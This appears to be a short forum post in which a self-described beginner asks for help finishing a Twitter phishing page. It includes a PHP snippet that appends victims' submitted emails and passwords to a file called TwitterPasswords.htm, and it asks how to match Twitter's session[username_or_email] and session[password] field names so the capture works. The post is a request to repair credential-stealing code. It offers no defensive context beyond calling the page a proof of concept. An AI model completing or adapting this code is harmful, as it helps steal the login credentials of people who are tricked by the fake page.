Hi all,
I'm trying to get a pof of a Twitter phishing, but I'm getting problems with the PHP file that writes victim's inputs into another file. The PHP code I started programming was this:
$fp = fopen("TwitterPasswords.htm", "a");
fwrite($fp, "Email:$_POST[username_or_email]\tPassword:$_POST[password]");
echo "<HTML>
and according to Twitter source page, variables are name="session[username_or_email]" and name="session[password]". I'm quite newbie, how can I handle those variables, please?
Thanks a lot,